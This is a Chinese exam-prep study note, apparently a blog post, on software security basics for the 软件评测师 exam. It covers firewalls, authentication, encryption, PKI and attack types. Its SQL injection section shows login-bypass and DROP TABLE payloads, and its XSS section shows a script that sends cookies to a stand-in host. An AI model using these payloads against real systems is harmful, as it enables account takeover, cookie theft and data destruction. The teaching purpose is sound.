安全防护体系

七个层次

  1. 实体安全
  2. 平台安全
  3. 数据安全
  4. 通信安全
  5. 应用安全
  6. 运行安全
  7. 管理安全

安全保护等级(5层,等级渐强)

  1. 用户自主——用户自己具备自主的安全保护能力,如通过用户、用户组来实现(账户、密码等)
  2. 系统审计——在用户自主级的基础上增加审计跟踪日志
  3. 安全标记——在第二级基础上指定了安全标记(划分不同的安全级别,有相应的权限才可进行访问)
  4. 结构化——在第三级基础上,将安全保护机制划分为关键部分和非关键部分的类别
  5. 访问验证——增设访问验证功能

数据安全策略

备份和恢复是一种数据安全策略
  • 存储设备
    磁盘阵列、磁带机(磁带库)、光盘库、SAN设备
  • 存储优化
    DAS、NAS、SAN
  • 存储保护
    磁盘阵列、双机容错、集群、备份与恢复
  • 存储管理
    数据库备份与恢复、文件与卷管理、复制、SAN管理

安全防护策略

软件系统对抗攻击的主要手段——安全防护策略

主要策略

  • 安全日志——被动防护策略(记录行为,不会主动防护)
  • 入侵检测——防火墙的第二道闸门,主动网络安全防护措施
  • 隔离防护
    ——隔离网闸:实现内网和外网的物理隔离
    ——防火墙:实现内网和外网的逻辑隔离
  • 漏洞扫描——使用扫描工具扫描漏洞,是黑客攻击的第一步

防火墙(类型)

包过滤防火墙

  • 对用户透明
  • 安全控制能力限于网络层传输层
  • 不建立链接状态表(一直保持开启),前后报文无关
  • 应用层控制弱

状态检测防火墙

  • 建立链接状态表者(可以使用动态的端口号,可以随时关闭或开启),前后报文相关
  • 应用层控制弱

代理服务防火墙

  • 检测一些应用层的安全行为
  • 防护等级高,效率低

用户认证机制

访问控制

访问控制的实现方式

  • 限制访问系统的人员——用户标识与验证(是访问控制的基础,是对用户身份的合法性验证)
  • 限制进入系统的用户所能做的操作——存取控制(限制权限法,隔离技术法)

三种常用的方法

  • 要求用户输入一些保密信息
  • 采用物理识别设备
  • 采用生物统计学系统

身份验证方式

  • 用户名/密码方式
  • IC卡认证——IC卡硬件不可复制
  • 动态密码——按照时间使用次数不断变化;每个密码只使用一次的技术
  • USB Key认证——采用软硬件结合,一次一密的强双因子验证(解决了安全性与易用性矛盾

用户口令保护策略

安全密码(首次登录必须修改口令)

  • 密码长度
  • 密码有效期
  • 密码组成:大写、小写、数字、特殊符号
  • 不带联想色彩(电话、生日、地址…)
  • 不用完整的单词(常用人名Alice等)

口令保护策略

  • 最大口令时效
  • 最小口令时效(防止被攻击后别人修改密码,使得管理员丧失管理权)
  • 口令历史(设置多久才能允许使用历史密码)
  • 最小口令长度
  • 口令复杂度
  • 加密选项
  • 口令锁定

加密技术

对称性加密

加密和解密使用相同的密钥

特点

  • 密钥分发困难
  • 算法效率高
  • 速度快
  • 适合于对大数据进行加密

常见对称性算法(私钥加密算法)

  • DES 3DES(三重DES)
  • RC- 5
  • IDEA 国际数据加密算法

非对称性加密

加密和解密使用不同的密钥

特点

  • 密钥成对出现
  • 密钥之间不能相互推导
  • 公钥对外公开
  • 私钥只有持有者持有
  • 算法相对于对称加密算法效率低

常见非对称算法(公钥加密算法)

  • RSA
  • ECC椭圆曲线算法
  • Elgamal算法
  • DSA 数字签名算法

PKI

公钥基础设施——解决公钥归属问题,如A与B通信,PKI确保确实公钥来自于A/B,而不是第三方
  • CA ——证书颁发机构,是PKI的核心
  • 数字证书——把公钥和拥有者绑定在一起的数字文件
  • 证书实现的安全保证——机密性、不可否认性、完整性、鉴别

签名+加密

注:D——解密;E——加密
对未加密的数据进行解密,也是数据变成不可阅读的方式,也可以看做加密

单向加密

非可逆加密

  • 就是不可解密的加密方法,也称单向加密

常见的单向加密算法

  • MD5
  • SHA(安全的哈希算法)——无论数据大小,通过哈希算法生成的哈希报文摘要位数固定;数据不同,生成的哈希报文摘要也不同
    ——等同于签名功能,但是效率比签名高
Hash+签名

网络攻击

网络攻击术语

  • 冒充——口令猜测、缓冲区溢出
  • 重演(重复演示)
  • 消息篡改——伪造电子邮件、DNS高速缓存污染(在高速缓存中修改信息)
  • 服务拒绝(DOS,DDOS无法正常提供服务)——死亡ping、泪滴攻击、UDP洪水、SYN洪水、Land攻击、Smurf攻击、Fraggle攻击、电子邮件炸弹、畸形信息攻击

病毒防治

计算机病毒

  • 病毒破坏者——人为的,可自我复制的
    潜伏性、传染性、隐蔽性、破坏性、多样性、条件触发性
  • 木马盗窃者
    不产生图标、伪装成“系统服务”的方式、自动运行、具备自动恢复、能自动开启端口,建立网络连接

计算机病毒与木马

常见安全协议(了解,考察协议之间的关系)

安全协议-SSL


安全协议-HTTPS

SQL注入攻击、XSS攻击(重要!!!)

SQL注入攻击

strSQL= "select * from users where (name = '"+ userName + "')
and (pw = '"+ passWord"');"
strSQL = "select * from users where (name = '1' or '1' = '1') and (pw = '1' or '1'='1');"
strSQL = "select * from users where (name = '张三';drop table users ;-- );"

XSS攻击

  • 跨站脚本攻击(Cross Site Scripting)
  • 原理:攻击者向有XSS漏洞的网站中输入(或传入)恶意的HTML代码,使得用户浏览该网站是,自动执行这段恶意代码,从而达到攻击的目的。
    ——如盗取用户cookie破坏页面结构重定向其他网站
http://bbs.xss.net/home?content = <script> alert("xss")</script>
http://www.xss.com?content = <script>window.open("www.xss1.com ?param=" document.cookie)</script>

XSS防御

  • 验证所有输入数据,有效检测攻击
  • 对所有输出数据进行适当的编码,以防止任何已成功注入的脚本在浏览器端运行

软件评测师——安全性基础知识相关推荐

  1. 软件评测师——软件工程基础知识2

    例题1 软件开发中的瀑布模型典型地刻画了软件生存周期的阶段划分,与其最相适应的软件开发方法是 (1) . (1)A. 构件化方法 B. 结构化方法 C. 面向对象方法 D. 快速原型方法 参考答案:瀑 ...

  2. 百万调音师—音频基础知识

    百万调音师-音频基础知识 音频基本属性 1).音频理论 2).音频格式 3).音频声道 声音如何传输到电脑? 模拟信号 数字信号 脉冲编码调制 1).滤波 2).采样 3).量化 4).编码 分贝 音 ...

  3. 视频教程-2020年软考信息系统项目管理师考试基础知识(下)新考纲视频培训课程-软考

    2020年软考信息系统项目管理师考试基础知识(下)新考纲视频培训课程 10年以上软考培训经验,线下培训学员过万人.培训过的课程有:网络规划设计师.网络工程师.信 息系统项目管理师.系统集成项目管理师. ...

  4. 华师计算机应用基础知识,华师计算机应用基础课后习题答案.doc

    华师计算机应用基础课后习题答案 华师计算机应用基础课后习题答案 华师作业答案 2011年<计算机基础>期末考试复习题 第一章 计算机基础知识 选择题: 1. 目前使用最广泛.发展最快的计算 ...

  5. 软件评测师-15.信息安全知识与安全测试

    15.信息安全知识与安全测试 15.1数据安全策略 15.1.1数据安全的相关概念 15.1.1.1信息安全 信息安全从其本质上来讲就是网络传输处理过程中的信息安全.它涉及的领域相当广泛.这是因为在目 ...

  6. 信息系统项目管理师论文基础知识

    摘要:信息系统项目管理师论文字数,考试时间.论文答题卡及注意事项,科科过给您图文介绍下. 字数要求:信息系统项目管理师论文一般是2000~2500字之间: 考试时间:120分钟: 一.信息系统项目管理 ...

  7. 软件评测师:数据库知识

    一.三级模式结构 模型:对现实世界特征的模拟和抽象 数据模型:对现实世界数据特征的抽象 数据模型的三要素: 数据结构:数据对象存储.组织的集合 数据操作:对数据对象操作的集合 数据的约束条件:数据对象 ...

  8. 系统校验矩阵怎么求_软考高级架构师:计算机系统基础知识

    计算机系统基础 计算机组成 CPU的功能 •(1)程序控制功能.CPU通过执行指令来控制程序的执行顺序. •(2)操作控制. •(3)时间控制. •(4)数据处理.CPU最根本的任务. (1)运算器. ...

  9. 华师计算机基础知识题库及答案,2014华师《计算机基础》题及答案

    资源描述: 1.第1题 数据是信息的载体,它的不同形式有数值.文字.语言.图形和____. A.多媒体 B.表达式 C.函数 D.图像 您的答案D 题目分数2.0 此题得分2.0 2.第2题 以下应用 ...

  10. 软件评测师 各章节考点汇总(基础知识部分)

    目录 计算机系统构成及硬件基础知识 数的表示 逻辑运算 定点数与浮点数 总线 CPU RISC/CISC指令 流水线 存储体系 Cache 寻址方式 校验码 输入/输出 操作系统知识 进程 程序语言基 ...

最新文章

  1. 基于BERT预训练的中文命名实体识别TensorFlow实现
  2. 业界资讯: Air 2.0 beta 版本 发布
  3. 【Android 启动过程】Activity 启动源码分析 ( AMS -> ActivityThread、AMS 线程阶段 二 )
  4. 纠正一个错误,分布式系统关注点第17篇
  5. 使用JGroups进行ElasticMQ消息复制
  6. 程序员工作3年只涨2千,你不知道程序员有多难!
  7. 以太坊白皮书_以太坊发展历程
  8. es中的search_type简单理解
  9. App列表之拖拽ListView(上)
  10. 掘金小册8折优惠:掌握这些技术,轻松拿offer
  11. 大数据集群安装02之Hadoop配置
  12. 砌体的弹性模量计算_砌体弹性模量等参数的取值.doc
  13. C语言 哲学家就餐问题
  14. 数组取交集、并集与补集
  15. QT QMessageBox 按钮文字更改为中文
  16. 三星在中国一面撤资,一面增资是为何?
  17. FineReport——登录不到决策系统
  18. 最简单三级管振荡分析(自由多谐振荡器电路)
  19. 云服务器修改dns 114,为什么改成114dns就行?
  20. Citric I 模拟赛心得

热门文章

  1. 开学季Web渗透测试工程师精英班“第5期”来袭,加入即永久观看!
  2. 利用PTGui制作全景图并用Pano2VR生成SWF文件
  3. 2010年中考英语写作高分指导
  4. 隐藏隧道通信:Socks 隧道
  5. 打印机主流的指令类型(ESC命令集+CPCL命令集+TSPL命令集)...
  6. 物联网项目设计 (七) 基于RT-thread的MQTT协议物联网辉光钟
  7. linux防火墙查看状态firewall、iptable
  8. python识别图片、PDF识别成文字、表格(包含去除水印) 代码不是最新,可在最下面Gitee地址查看最新代码
  9. 三星s4 android 5.0 root权限,三星S4(i9500)一键ROOT权限获取+USB驱动
  10. ov5640摄像头使用心得